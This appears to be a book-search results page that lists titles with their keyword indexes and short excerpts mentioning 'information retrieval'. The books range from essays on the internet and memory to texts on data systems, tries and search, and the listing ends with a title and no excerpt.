A Declaration of the Independence of Cyberspace, Albert Einstein, AltaVista, Amazon Mechanical Turk, Asperger Syndrome, availability heuristic, Benoit Mandelbrot, biofilm, Black Swan, British Empire, conceptual framework, corporate governance, Danny Hillis, Douglas Engelbart, Douglas Engelbart, Emanuel Derman, epigenetics, Flynn Effect, Frank Gehry, Google Earth, hive mind, Howard Rheingold, index card, information retrieval, Internet Archive, invention of writing, Jane Jacobs, Jaron Lanier, John Markoff, Kevin Kelly, lifelogging, lone genius, loss aversion, mandelbrot fractal, Marc Andreessen, Marshall McLuhan, Menlo Park, meta analysis, meta-analysis, New Journalism, Nicholas Carr, out of africa, Paul Samuelson, peer-to-peer, Ponzi scheme, pre–internet, Richard Feynman, Rodney Brooks, Ronald Reagan, Schrödinger's Cat, Search for Extraterrestrial Intelligence, SETI@home, Silicon Valley, Skype, slashdot, smart grid, social graph, social software, social web, Stephen Hawking, Steve Wozniak, Steven Pinker, Stewart Brand, Ted Nelson, telepresence, the medium is the message, the scientific method, The Wealth of Nations by Adam Smith, theory of mind, trade route, upwardly mobile, Vernor Vinge, Whole Earth Catalog, X Prize

And when a file becomes corrupt, all I am left with is a pointer, a void where an idea should be, the ghost of a departed thought. The New Balance: More Processing, Less Memorization Fiery Cushman Postdoctoral fellow, Mind/Brain/Behavior Interfaculty Initiative, Harvard University The Internet changes the way I behave, and possibly the way I think, by reducing the processing costs of information retrieval. I focus more on knowing how to obtain and use information online and less on memorizing it. This tradeoff between processing and memory reminds me of one of my father’s favorite stories, perhaps apocryphal, about studying the periodic table of the elements in his high school chemistry class. On their test, the students were given a blank table and asked to fill in names and atomic weights.

I look up recipes after I arrive at the supermarket. And when a friend cooks a good meal, I’m more interested to learn what Website it came from than how it was spiced. I don’t know most of the American Psychological Association rules for style and citation, but my computer does. For any particular “computation” I perform, I don’t need the same depth of knowledge, because I have access to profoundly more efficient processes of information retrieval. So the Internet clearly changes the way I behave. It must be changing the way I think at some level, insofar as my behavior is a product of my thoughts. It probably is not changing the basic kinds of mental processes I can perform but it might be changing their relative weighting. We psychologists love to impress undergraduates with the fact that taxi drivers have unusually large hippocampi.

Anthony Aguirre Associate professor of physics, University of California, Santa Cruz Recently I wanted to learn about twelfth-century China—not a deep or scholarly understanding, just enough to add a bit of not-wrong color to something I was writing. Wikipedia was perfect! More regularly, my astrophysics and cosmology endeavors bring me to databases such as arXiv, ADS (Astrophysics Data System), and SPIRES (Stanford Physics Information Retrieval System), which give instant and organized access to all the articles and information I might need to research and write. Between such uses and an appreciable fraction of my time spent processing e-mails, I, like most of my colleagues, spend a lot of time connected to the Internet. It is a central tool in my research life. Yet what I do that is most valuable—to me, at least—is the occasional generation of genuine creative insights.


pages: 58 words: 12,386

Big Data Glossary by Pete Warden

business intelligence, crowdsourcing, fault tolerance, information retrieval, linked data, natural language processing, recommendation engine, web application

As a user, you select elements on an example page that contain the data you’re interested in, and the tool then uses the patterns you’ve defined to pull out information from other pages on a site with a similar structure. For example, you might want to extract product names and prices from a shopping site. With the tool, you could find a single product page, select the product name and price, and then the same elements would be pulled for every other page it crawled from the site. It relies on the fact that most web pages are generated by combining templates with information retrieved from a database, and so have a very consistent structure. Once you’ve gathered the data, it offers some features that are a bit like Google Refine’s for de-duplicating and cleaning up the data. All in all, it’s a very powerful tool for turning web content into structured information, with a very approachable interface. ScraperWiki ScraperWiki is a hosted environment for writing automated processes to scan public websites and extract structured information from the pages they’ve published.


pages: 586 words: 186,548

Architects of Intelligence by Martin Ford

3D printing, agricultural Revolution, AI winter, Apple II, artificial general intelligence, Asilomar, augmented reality, autonomous vehicles, barriers to entry, basic income, Baxter: Rethink Robotics, Bayesian statistics, bitcoin, business intelligence, business process, call centre, cloud computing, cognitive bias, Colonization of Mars, computer vision, correlation does not imply causation, crowdsourcing, DARPA: Urban Challenge, deskilling, disruptive innovation, Donald Trump, Douglas Hofstadter, Elon Musk, Erik Brynjolfsson, Ernest Rutherford, Fellow of the Royal Society, Flash crash, future of work, gig economy, Google X / Alphabet X, Gödel, Escher, Bach, Hans Rosling, ImageNet competition, income inequality, industrial robot, information retrieval, job automation, John von Neumann, Law of Accelerating Returns, life extension, Loebner Prize, Mark Zuckerberg, Mars Rover, means of production, Mitch Kapor, natural language processing, new economy, optical character recognition, pattern recognition, phenotype, Productivity paradox, Ray Kurzweil, recommendation engine, Robert Gordon, Rodney Brooks, Sam Altman, self-driving car, sensor fusion, sentiment analysis, Silicon Valley, smart cities, social intelligence, speech recognition, statistical model, stealth mode startup, stem cell, Stephen Hawking, Steve Jobs, Steve Wozniak, Steven Pinker, strong AI, superintelligent machines, Ted Kaczynski, The Rise and Fall of American Growth, theory of mind, Thomas Bayes, Travis Kalanick, Turing test, universal basic income, Wall-E, Watson beat the top human players on Jeopardy!, women in the workforce, working-age population, zero-sum game, Zipcar

From 1996 to 1999, he worked for Digital Equipment Corporation’s Western Research Lab in Palo Alto, where he worked on low-overhead profiling tools, design of profiling hardware for out-of-order microprocessors, and web-based information retrieval. From 1990 to 1991, Jeff worked for the World Health Organization’s Global Programme on AIDS, developing software to do statistical modeling, forecasting, and analysis of the HIV pandemic. In 2009, Jeff was elected to the National Academy of Engineering, and he was also named a Fellow of the Association for Computing Machinery (ACM) and a Fellow of the American Association for the Advancement of Sciences (AAAS). His areas of interest include large-scale distributed systems, performance monitoring, compression techniques, information retrieval, application of machine learning to search and other related problems, microprocessor architecture, compiler optimizations, and development of new products that organize existing information in new and interesting ways.

That made me start thinking about AI again I eventually figured out that the reason Watson won is because it was actually a narrower AI problem than it first appeared to be. That’s almost always the answer. In Watson’s case it’s because about 95% of the answers in Jeopardy turn out to be the titles of Wikipedia pages. Instead of understanding language, reasoning about it and so forth, it was mostly doing information retrieval from a restricted set, namely the pages that are Wikipedia titles. It was actually not as hard of a problem as it looked like to the untutored eye, but it was interesting enough that it got me to think about AI again. Around the same time, I started writing for The New Yorker, where I was producing a lot of pieces about neuroscience, linguistics, psychology, and also AI. In my pieces, I was trying to use what I knew about cognitive science and everything around that—how the mind and language work, how children’s minds develop, etc.

MARTIN FORD: Of course, that’s not a problem that’s exclusive to AI; humans are subject to the same issues when confronted with flawed data. It’s a bias in the data that results from past decisions that people doing research made. BARBARA GROSZ: Right, but now look what’s going on in some areas of medicine. The computer system can, “read all the papers” (more than a person could) and do certain kinds of information retrieval from them and extract results, and then do statistical analyses. But if most of the papers are on scientific work that was done only on male mice, or only on male humans, then the conclusions the system is coming to are limited. We’re also seeing this problem in the legal realm, with policing and fairness. So, as we build these systems, we have to think, “OK. What about how my data can be used?”


pages: 259 words: 73,193

The End of Absence: Reclaiming What We've Lost in a World of Constant Connection by Michael Harris

4chan, Albert Einstein, AltaVista, Andrew Keen, augmented reality, Burning Man, Carrington event, cognitive dissonance, crowdsourcing, dematerialisation, en.wikipedia.org, Filter Bubble, Firefox, Google Glasses, informal economy, information retrieval, invention of movable type, invention of the printing press, invisible hand, James Watt: steam engine, Jaron Lanier, jimmy wales, Kevin Kelly, lifelogging, Loebner Prize, low earth orbit, Marshall McLuhan, McMansion, moral panic, Nicholas Carr, pattern recognition, pre–internet, Republic of Letters, Silicon Valley, Skype, Snapchat, social web, Steve Jobs, the medium is the message, The Wisdom of Crowds, Turing test

Others argue that future generations will learn to make new connections with facts that aren’t held in their heads, that dematerialized knowledge can still lead to innovation. As we inevitably off-load media content to the cloud—storing our books, our television programs, our videos of the trip to Taiwan, and photos of Grandma’s ninetieth birthday, all on a nameless server—can we happily dematerialize our mind’s stores, too? Perhaps we should side with philosopher Lewis Mumford, who insisted in The Myth of the Machine that “information retrieving,” however expedient, is simply no substitute for the possession of knowledge accrued through personal and direct labor. Author Clive Thompson wondered about this when he came across recent research suggesting that we remember fewer and fewer facts these days—of three thousand people polled by neuroscientist Ian Robertson, the young were less able to recall basic personal information (a full one-third, for example, didn’t know their own phone numbers).

., 92 Franklin, Benjamin, 192 friends, 30–31 Frind, Markus, 182–83 Furbies, 29–30 Füssel, Stephan, 103 Gaddam, Sai, 173 Gallup, 123 genes, 41–43 Gentile, Douglas, 118–21 German Ideology, The (Marx), 12n Gleick, James, 137 Globe and Mail, 81–82, 89 glossary, 211–16 Google, 3, 8, 18–19, 24, 33, 43, 49, 82, 96, 142, 185 memory and, 143–47 search results on, 85–86, 91 Google AdSense, 85 Google Books, 102–3 Google Glass, 99–100 Google Maps, 91 Google Plus, 31 Gopnik, Alison, 33–34 Gould, Glenn, 200–201, 204 GPS, 35, 59, 68, 171 Greenfield, Susan, 20, 25 Grindr, 165, 167, 171, 173–74, 176 Guardian, 66n Gutenberg, Johannes, 11–13, 14, 16, 21, 34, 98 Gutenberg Bible, 83, 103 Gutenberg Galaxy, The (McLuhan), 179, 201 Gutenberg Revolution, The (Man), 12n, 103 GuySpy, 171, 172, 173 Hangul, 12n Harari, Haim, 141 Harry Potter series, 66n Hazlehurst, Ronnie, 74 Heilman, James, 75–79 Henry, William A., III, 84–85 “He Poos Clouds” (Pallett), 164 History of Reading, A (Manguel), 16, 117, 159 Hollinghurst, Alan, 115 Holmes, Sherlock, 147–48 House at Pooh Corner, The (Milne), 93 Hugo, Victor, 20–21 “Idea of North, The” (Gould), 200–201 In Defense of Elitism (Henry), 84–85 Information, The (Gleick), 137 information retrieval, 141–42 Innis, Harold, 202 In Search of Lost Time (Proust), 160 Instagram, 19, 104, 149 Internet, 19, 20, 21, 23, 26–27, 55, 69, 125, 126, 129, 141, 143, 145, 146, 187, 199, 205 brain and, 37–38, 40, 142, 185 going without, 185, 186, 189–97, 200, 208–9 remembering life before, 7–8, 15–16, 21–22, 48, 55, 203 Internship, The, 89 iPad, 21, 31 children and, 26–27, 45 iPhone, see phones iPotty, 26 iTunes, 89 Jobs, Steve, 134 Jones, Patrick, 152n Justification of Johann Gutenberg, The (Morrison), 12 Kaiser Foundation, 27, 28n Kandel, Eric, 154 Kaufman, Charlie, 155 Keen, Andrew, 88 Kelly, Kevin, 43 Kierkegaard, Søren, 49 Kinsey, Alfred, 173 knowledge, 11–12, 75, 80, 82, 83, 86, 92, 94, 98, 141, 145–46 Google Books and, 102–3 Wikipedia and, 63, 78 Koller, Daphne, 95 Kranzberg, Melvin, 7 Kundera, Milan, 184 Lanier, Jaron, 85, 106–7, 189 latent Dirichlet allocation (LDA), 64–65 Leonardo da Vinci, 56 Lewis, R.


Beautiful Data: The Stories Behind Elegant Data Solutions by Toby Segaran, Jeff Hammerbacher

23andMe, airport security, Amazon Mechanical Turk, bioinformatics, Black Swan, business intelligence, card file, cloud computing, computer vision, correlation coefficient, correlation does not imply causation, crowdsourcing, Daniel Kahneman / Amos Tversky, DARPA: Urban Challenge, data acquisition, database schema, double helix, en.wikipedia.org, epigenetics, fault tolerance, Firefox, Hans Rosling, housing crisis, information retrieval, lake wobegon effect, longitudinal study, Mars Rover, natural language processing, openstreetmap, prediction markets, profit motive, semantic web, sentiment analysis, Simon Singh, social graph, SPARQL, speech recognition, statistical model, supply-chain management, text mining, Vernor Vinge, web application

A Business Intelligence System In a 1958 paper in the IBM Systems Journal, Hans Peter Luhn describes a system for “selective dissemination” of documents to “action points” based on the “interest profiles” of the individual action points. The author demonstrates shocking prescience. The title of the paper is “A Business Intelligence System,” and it appears to be the first use of the term “Business Intelligence” in its modern context. In addition to the dissemination of information in real time, the system was to allow for “information retrieval”—search—to be conducted over the entire document collection. Luhn’s emphasis on action points focuses the role of information processing on goal completion. In other words, it’s not enough to just collect and aggregate data; an organization must improve its capacity to complete critical tasks because of the insights gleaned from the data. He also proposes “reporters” to periodically sift the data and selectively move information to action points as needed.

Volunteered, or community contributed, geographic information THE GEOGRAPHIC BEAUTY OF A PHOTOGRAPHIC ARCHIVE Download at Boykma.Com 91 such as the personal descriptions of place available in Geograph gives us access to new and multiple perspectives. These may reflect a range of viewpoints and enable us to begin to consider alternative notions of place as we attempt to describe it more effectively. Consequently, Ross Purves and Alistair Edwardes have been using Geograph as a source of descriptions of place in their research at the University of Zurich. Their ultimate objective involves improving information retrieval by automatically adding indexing terms to georeferenced digital photographs that relate to popular notions of place, such as “mountain,” “remote,” or “hiking.” Their work involves validating previous studies and forming new perspectives by comparing Geograph to existing efforts to describe place and analyzing term co-occurrence in the geograph descriptions (Edwardes and Purves 2007). A popular approach in the literature involves identifying basic levels or scene types through which place is described.

Rasmussen, and A. Y. Halevy. “Google’s Deep-Web Crawl.” PVLDB 1(2): 1241–1252 (2008). Ntoulas, A., P. Zerfos, and J. Cho. “Downloading textual hidden web content through keyword queries.” JCDL 2005: 100–109. SURFACING THE DEEP WEB Download at Boykma.Com 147 Raghavan, S. and H. Garcia-Molina. “Crawling the Hidden Web.” VLDB 2001: 129–138. Salton, G. and M. J. McGill. Introduction to Modern Information Retrieval. New York: McGraw-Hill, 1983. SpiderMonkey (JavaScript-C) Engine, http://www.mozilla.org/js/spidermonkey/. V8 JavaScript Engine, http://code.google.com/p/v8/. 148 CHAPTER NINE Download at Boykma.Com Chapter 10 CHAPTER TEN Building Radiohead’s House of Cards Aaron Koblin with Valdean Klump THIS IS THE STORY OF HOW THE GRAMMY-NOMINATED MUSIC VIDEO FOR RADIOHEAD’S “HOUSE OF Cards” was created entirely with data.


pages: 135 words: 26,407

How to DeFi by Coingecko, Darren Lau, Sze Jin Teh, Kristian Kho, Erina Azmi, Tm Lee, Bobby Ong

algorithmic trading, asset allocation, Bernie Madoff, bitcoin, blockchain, buy and hold, capital controls, collapse of Lehman Brothers, cryptocurrency, distributed ledger, diversification, Ethereum, ethereum blockchain, fiat currency, Firefox, information retrieval, litecoin, margin call, new economy, passive income, payday loans, peer-to-peer, prediction markets, QR code, reserve currency, smart contracts, tulip mania, two-sided market

Retrieved from https://blog.openzeppelin.com/opyn-contracts-audit/ ~ Chapter 13: Dashboard Dashboard for DeFi. (n.d.). Retrieved from https://www.defisnap.io/#/dashboard ~ Chapter 14: DeFi in Action (n.d.). Retrieved October 19, 2019, from https://slideslive.com/38920018/living-on-defi-how-i-survive-argentinas-50-inflation Gundiuc, C. (2019, September 29). Argentina Central Bank Exposed 800 Citizens' Sensitive Information. Retrieved from https://beincrypto.com/argentina-central-bank-exposed-sensitive-information-of-800-citizens/ Lopez, J. M. S. (2020, February 5). Argentina’s ‘little trees’ blossom as forex controls fuel black market. Retrieved from https://www.reuters.com/article/us-argentina-currency-blackmarket/argentinas-little-trees-blossom-as-forex-controls-fuel-black-market-idUSKBN1ZZ1H1 Russo, C. (2019, December 9).


The Art of Computer Programming: Sorting and Searching by Donald Ervin Knuth

card file, Claude Shannon: information theory, complexity theory, correlation coefficient, Donald Knuth, double entry bookkeeping, Eratosthenes, Fermat's Last Theorem, G4S, information retrieval, iterative process, John von Neumann, linked data, locality of reference, Menlo Park, Norbert Wiener, NP-complete, p-value, Paul Erdős, RAND corporation, refrigerator car, sorting algorithm, Vilfredo Pareto, Yogi Berra, Zipf's Law

. — TITUS LIVIUS, Ab Urbe Condita XXXIX.vi (Robert Burton, Anatomy of Melancholy 1.2.2.2) This book forms a natural sequel to the material on information structures in Chapter 2 of Volume 1, because it adds the concept of linearly ordered data to the other basic structural ideas. The title "Sorting and Searching" may sound as if this book is only for those systems programmers who are concerned with the preparation of general-purpose sorting routines or applications to information retrieval. But in fact the area of sorting and searching provides an ideal framework for discussing a wide variety of important general issues: • How are good algorithms discovered? • How can given algorithms and programs be improved? • How can the efficiency of algorithms be analyzed mathematically? • How can a person choose rationally between different algorithms for the same task? • In what senses can algorithms be proved "best possible"?

For example, given a large file about stage performers, a producer might wish to find all unemployed actresses between 25 and 30 with dancing talent and a French accent; given a large file of baseball statistics, a sportswriter may wish to determine the total number of runs scored by the Chicago White Sox in 1964, during the seventh inning of night games, against left-handed pitchers. Given a large file of data about anything, people like to ask arbitrarily complicated questions. Indeed, we might consider an entire library as a database, and a searcher may want to find everything that has been published about information retrieval. An introduction to the techniques for such secondary key (multi-attribute) retrieval problems appears below in Section 6.5. Before entering into a detailed study of searching, it may be helpful to put things in historical perspective. During the pre-computer era, many books of logarithm tables, trigonometry tables, etc., were compiled, so that mathematical calculations could be replaced by searching.

If we pursue the thumb-index idea to one of its logical conclusions, we come up with a searching scheme based on repeated "subscripting" as illustrated in Table 1. Suppose that we want to test a given search argument to see whether it is one of the 31 most common words of English (see Figs. 12 and 13 in Section 6.2.2). The data is represented in Table 1 as a trie structure; this name was suggested by E. Fredkin [CACM 3 A960), 490-500] because it is a part of information retrieval. A trie — pronounced "try" —is essentially an M-ary tree, whose nodes are M-place vectors with components corresponding to digits or characters. Each node on level I represents the set of all keys that begin with a certain sequence of I characters called its prefix; the node specifies an M-way branch, depending on the (I + l)st character. For example, the trie of Table 1 has 12 nodes; node A) is the root, and we look up the first letter here.


Martin Kleppmann-Designing Data-Intensive Applications. The Big Ideas Behind Reliable, Scalable and Maintainable Systems-O’Reilly (2017) by Unknown

active measures, Amazon Web Services, bitcoin, blockchain, business intelligence, business process, c2.com, cloud computing, collaborative editing, commoditize, conceptual framework, cryptocurrency, database schema, DevOps, distributed ledger, Donald Knuth, Edward Snowden, Ethereum, ethereum blockchain, fault tolerance, finite state, Flash crash, full text search, general-purpose programming language, informal economy, information retrieval, Internet of things, iterative process, John von Neumann, Kubernetes, loose coupling, Marc Andreessen, microservices, natural language processing, Network effects, packet switching, peer-to-peer, performance metric, place-making, premature optimization, recommendation engine, Richard Feynman, self-driving car, semantic web, Shoshana Zuboff, social graph, social web, software as a service, software is eating the world, sorting algorithm, source of truth, SPARQL, speech recognition, statistical model, undersea cable, web application, WebSocket, wikimedia commons

None of the databases described here can handle this kind of usage, which is why researchers have written specialized genome database software like GenBank [48]. • Particle physicists have been doing Big Data–style large-scale data analysis for decades, and projects like the Large Hadron Collider (LHC) now work with hun‐ dreds of petabytes! At such a scale custom solutions are required to stop the hardware cost from spiraling out of control [49]. • Full-text search is arguably a kind of data model that is frequently used alongside databases. Information retrieval is a large specialist subject that we won’t cover in great detail in this book, but we’ll touch on search indexes in Chapter 3 and Part III. We have to leave it there for now. In the next chapter we will discuss some of the trade-offs that come into play when implementing the data models described in this chapter. References [1] Edgar F. Codd: “A Relational Model of Data for Large Shared Data Banks,” Com‐ munications of the ACM, volume 13, number 6, pages 377–387, June 1970. doi: 10.1145/362384.362685 [2] Michael Stonebraker and Joseph M.

In LevelDB, this in-memory index is a sparse collection of some of the keys, but in Lucene, the in-memory index is a finite state automaton over the characters in the keys, similar to a trie [38]. This automaton can be transformed into a Levenshtein automaton, which supports efficient search for words within a given edit distance [39]. Other fuzzy search techniques go in the direction of document classification and machine learning. See an information retrieval textbook for more detail [e.g., 40]. Keeping everything in memory The data structures discussed so far in this chapter have all been answers to the limi‐ tations of disks. Compared to main memory, disks are awkward to deal with. With both magnetic disks and SSDs, data on disk needs to be laid out carefully if you want good performance on reads and writes. However, we tolerate this awkwardness because disks have two significant advantages: they are durable (their contents are not lost if the power is turned off), and they have a lower cost per gigabyte than RAM.

Williams: “Burst Tries: A Fast, Efficient Data Structure for String Keys,” ACM Transactions on Information Systems, volume 20, number 2, pages 192–223, April 2002. doi:10.1145/506309.506312 [39] Klaus U. Schulz and Stoyan Mihov: “Fast String Correction with Levenshtein Automata,” International Journal on Document Analysis and Recognition, volume 5, number 1, pages 67–85, November 2002. doi:10.1007/s10032-002-0082-8 [40] Christopher D. Manning, Prabhakar Raghavan, and Hinrich Schütze: Introduc‐ tion to Information Retrieval. Cambridge University Press, 2008. ISBN: 978-0-521-86571-5, available online at nlp.stanford.edu/IR-book 106 | Chapter 3: Storage and Retrieval [41] Michael Stonebraker, Samuel Madden, Daniel J. Abadi, et al.: “The End of an Architectural Era (It’s Time for a Complete Rewrite),” at 33rd International Confer‐ ence on Very Large Data Bases (VLDB), September 2007. [42] “VoltDB Technical Overview White Paper,” VoltDB, 2014. [43] Stephen M.


pages: 1,237 words: 227,370

Designing Data-Intensive Applications: The Big Ideas Behind Reliable, Scalable, and Maintainable Systems by Martin Kleppmann

active measures, Amazon Web Services, bitcoin, blockchain, business intelligence, business process, c2.com, cloud computing, collaborative editing, commoditize, conceptual framework, cryptocurrency, database schema, DevOps, distributed ledger, Donald Knuth, Edward Snowden, Ethereum, ethereum blockchain, fault tolerance, finite state, Flash crash, full text search, general-purpose programming language, informal economy, information retrieval, Infrastructure as a Service, Internet of things, iterative process, John von Neumann, Kubernetes, loose coupling, Marc Andreessen, microservices, natural language processing, Network effects, packet switching, peer-to-peer, performance metric, place-making, premature optimization, recommendation engine, Richard Feynman, self-driving car, semantic web, Shoshana Zuboff, social graph, social web, software as a service, software is eating the world, sorting algorithm, source of truth, SPARQL, speech recognition, statistical model, undersea cable, web application, WebSocket, wikimedia commons

None of the databases described here can handle this kind of usage, which is why researchers have written specialized genome database software like GenBank [48]. Particle physicists have been doing Big Data–style large-scale data analysis for decades, and projects like the Large Hadron Collider (LHC) now work with hundreds of petabytes! At such a scale custom solutions are required to stop the hardware cost from spiraling out of control [49]. Full-text search is arguably a kind of data model that is frequently used alongside databases. Information retrieval is a large specialist subject that we won’t cover in great detail in this book, but we’ll touch on search indexes in Chapter 3 and Part III. We have to leave it there for now. In the next chapter we will discuss some of the trade-offs that come into play when implementing the data models described in this chapter. Footnotes i A term borrowed from electronics. Every electric circuit has a certain impedance (resistance to alternating current) on its inputs and outputs.

In LevelDB, this in-memory index is a sparse collection of some of the keys, but in Lucene, the in-memory index is a finite state automaton over the characters in the keys, similar to a trie [38]. This automaton can be transformed into a Levenshtein automaton, which supports efficient search for words within a given edit distance [39]. Other fuzzy search techniques go in the direction of document classification and machine learning. See an information retrieval textbook for more detail [e.g., 40]. Keeping everything in memory The data structures discussed so far in this chapter have all been answers to the limitations of disks. Compared to main memory, disks are awkward to deal with. With both magnetic disks and SSDs, data on disk needs to be laid out carefully if you want good performance on reads and writes. However, we tolerate this awkwardness because disks have two significant advantages: they are durable (their contents are not lost if the power is turned off), and they have a lower cost per gigabyte than RAM.

Williams: “Burst Tries: A Fast, Efficient Data Structure for String Keys,” ACM Transactions on Information Systems, volume 20, number 2, pages 192–223, April 2002. doi:10.1145/506309.506312 [39] Klaus U. Schulz and Stoyan Mihov: “Fast String Correction with Levenshtein Automata,” International Journal on Document Analysis and Recognition, volume 5, number 1, pages 67–85, November 2002. doi:10.1007/s10032-002-0082-8 [40] Christopher D. Manning, Prabhakar Raghavan, and Hinrich Schütze: Introduction to Information Retrieval. Cambridge University Press, 2008. ISBN: 978-0-521-86571-5, available online at nlp.stanford.edu/IR-book [41] Michael Stonebraker, Samuel Madden, Daniel J. Abadi, et al.: “The End of an Architectural Era (It’s Time for a Complete Rewrite),” at 33rd International Conference on Very Large Data Bases (VLDB), September 2007. [42] “VoltDB Technical Overview White Paper,” VoltDB, 2014. [43] Stephen M.


pages: 855 words: 178,507

The Information: A History, a Theory, a Flood by James Gleick

Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, AltaVista, bank run, bioinformatics, Brownian motion, butterfly effect, citation needed, Claude Shannon: information theory, clockwork universe, computer age, conceptual framework, crowdsourcing, death of newspapers, discovery of DNA, Donald Knuth, double helix, Douglas Hofstadter, en.wikipedia.org, Eratosthenes, Fellow of the Royal Society, Gödel, Escher, Bach, Henri Poincaré, Honoré de Balzac, index card, informal economy, information retrieval, invention of the printing press, invention of writing, Isaac Newton, Jacquard loom, Jaron Lanier, jimmy wales, Johannes Kepler, John von Neumann, Joseph-Marie Jacquard, lifelogging, Louis Daguerre, Marshall McLuhan, Menlo Park, microbiome, Milgram experiment, Network effects, New Journalism, Norbert Wiener, Norman Macrae, On the Economy of Machinery and Manufactures, PageRank, pattern recognition, phenotype, Pierre-Simon Laplace, pre–internet, Ralph Waldo Emerson, RAND corporation, reversible computing, Richard Feynman, Rubik’s Cube, Simon Singh, Socratic dialogue, Stephen Hawking, Steven Pinker, stochastic process, talking drums, the High Line, The Wisdom of Crowds, transcontinental railway, Turing machine, Turing test, women in the workforce

And then, when it was made simple, distilled, counted in bits, information was found to be everywhere. Shannon’s theory made a bridge between information and uncertainty; between information and entropy; and between information and chaos. It led to compact discs and fax machines, computers and cyberspace, Moore’s law and all the world’s Silicon Alleys. Information processing was born, along with information storage and information retrieval. People began to name a successor to the Iron Age and the Steam Age. “Man the food-gatherer reappears incongruously as information-gatherer,”♦ remarked Marshall McLuhan in 1967.♦ He wrote this an instant too soon, in the first dawn of computation and cyberspace. We can see now that information is what our world runs on: the blood and the fuel, the vital principle. It pervades the sciences from top to bottom, transforming every branch of knowledge.

(Eliot said that, too: “Where is the wisdom we have lost in knowledge? / Where is the knowledge we have lost in information?”) It is an ancient observation, but one that seemed to bear restating when information became plentiful—particularly in a world where all bits are created equal and information is divorced from meaning. The humanist and philosopher of technology Lewis Mumford, for example, restated it in 1970: “Unfortunately, ‘information retrieving,’ however swift, is no substitute for discovering by direct personal inspection knowledge whose very existence one had possibly never been aware of, and following it at one’s own pace through the further ramification of relevant literature.”♦ He begged for a return to “moral self-discipline.” There is a whiff of nostalgia in this sort of warning, along with an undeniable truth: that in the pursuit of knowledge, slower can be better.

♦ “THOSE DAYS, WHEN (AFTER PROVIDENCE”: Alexander Pope, The Dunciad (1729) (London: Methuen, 1943), 41. ♦ “KNOWLEDGE OF SPEECH, BUT NOT OF SILENCE”: T. S. Eliot, “The Rock,” in Collected Poems: 1909–1962 (New York: Harcourt Brace, 1963), 147. ♦ “THE TSUNAMI OF AVAILABLE FACT”: David Foster Wallace, Introduction to The Best American Essays 2007 (New York: Mariner, 2007). ♦ “UNFORTUNATELY, ‘INFORMATION RETRIEVING,’ HOWEVER SWIFT”: Lewis Mumford, The Myth of the Machine, vol. 2, The Pentagon of Power (New York: Harcourt, Brace, 1970), 182. ♦ “ELECTRONIC MAIL SYSTEM”: Jacob Palme, “You Have 134 Unread Mail! Do You Want to Read Them Now?” in Computer-Based Message Services, ed. Hugh T. Smith (North Holland: Elsevier, 1984), 175–76. ♦ A PAIR OF PSYCHOLOGISTS: C. J. Bartlett and Calvin G. Green, “Clinical Prediction: Does One Sometimes Know Too Much,” Journal of Counseling Psychology 13, no. 3 (1966): 267–70


pages: 153 words: 27,424

REST API Design Rulebook by Mark Masse

anti-pattern, conceptual framework, create, read, update, delete, data acquisition, database schema, hypertext link, information retrieval, web application

The HyperText Mark-up Language (HTML), to represent informative documents that contain links to related documents. The first web server.[8] The first web browser, which Berners-Lee also named “WorldWideWeb” and later renamed “Nexus” to avoid confusion with the Web itself. The first WYSIWYG[9] HTML editor, which was built right into the browser. On August 6, 1991, on the Web’s first page, Berners-Lee wrote, The WorldWideWeb (W3) is a wide-area hypermedia information retrieval initiative aiming to give universal access to a large universe of documents.[10] From that moment, the Web began to grow, at times exponentially. Within five years, the number of web users skyrocketed to 40 million. At one point, the number was doubling every two months. The “universe of documents” that Berners-Lee had described was indeed expanding. In fact, the Web was growing too large, too fast, and it was heading toward collapse.


pages: 281 words: 95,852

The Googlization of Everything: by Siva Vaidhyanathan

1960s counterculture, activist fund / activist shareholder / activist investor, AltaVista, barriers to entry, Berlin Wall, borderless world, Burning Man, Cass Sunstein, choice architecture, cloud computing, computer age, corporate social responsibility, correlation does not imply causation, creative destruction, data acquisition, death of newspapers, don't be evil, Firefox, Francis Fukuyama: the end of history, full text search, global pandemic, global village, Google Earth, Howard Rheingold, informal economy, information retrieval, John Markoff, Joseph Schumpeter, Kevin Kelly, knowledge worker, libertarian paternalism, market fundamentalism, Marshall McLuhan, means of production, Mikhail Gorbachev, moral panic, Naomi Klein, Network effects, new economy, Nicholas Carr, PageRank, Panopticon Jeremy Bentham, pirate software, Ray Kurzweil, Richard Thaler, Ronald Reagan, side project, Silicon Valley, Silicon Valley ideology, single-payer health, Skype, Social Responsibility of Business Is to Increase Its Profits, social web, Steven Levy, Stewart Brand, technoutopianism, The Nature of the Firm, The Structural Transformation of the Public Sphere, Thorstein Veblen, urban decay, web application, zero-sum game

In 2009 the core service of Google—its Web search engine—handled more than 70 percent of the Web search business in the United States and more than 90 percent in much of Europe, and grew at impressive rates elsewhere around the world. 15. Thorsten Joachims et al., “Accurately Interpreting Clickthrough Data as Implicit Feedback,” Proceedings of the 28th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval (Salvador, Brazil: ACM, 2005), 154–61. 16. B. J. Jansen and U. Pooch, “A Review of Web Searching Studies and a Framework for Future Research,” Journal of the American Society for Information Science and Technology 52, no. 3 (2001): 235–46; Amanda Spink and Bernard J. Jansen, Web Search: Public Searching on the Web (Dordrecht: Kluwer Academic Publishers, 2004); Caroline M. Eastman and Bernard J.

Liwen Vaughan and Yanjun Zhang, “Equal Representation by Search Engines? A Comparison of Websites across Countries and Domains,” Journal of Computer-Mediated Communication 12, no. 3 (2007), http://jcmc.indiana.edu. 69. Wingyan Chung, “Web Searching in a Multilingual World,” Communications of the ACM 51, no. 5 (2008): 32–40; Fotis Lazarinis et al., “Current Research Issues and Trends in Non-English Web Searching,” Information Retrieval 12, no. 3 (2009): 230–50. 70. “Google’s Market Share in Your Country.” 71. Choe Sang-Hun, “Crowd’s Wisdom Helps South Korean Search Engine Beat Google and Yahoo,” New York Times, July 4, 2007. 72. “S. Korea May Clash with Google over Internet Regulation Differences,” Hankyoreh, April 17, 2009; Kim Tong-hyung, “Google Refuses to Bow to Gov’t Pressure,” Korea Times, April 9, 2009. 73. Marcus Alexander, “The Internet and Democratization: The Development of Russian Internet Policy,” Demokratizatsiya 12, no. 4 (Fall 2004): 607–27; Ronald Deibert et al., Access Denied: The Practice and Policy of Global Internet Filtering (Cambridge, MA: MIT Press, 2008). 74.


Beautiful Visualization by Julie Steele

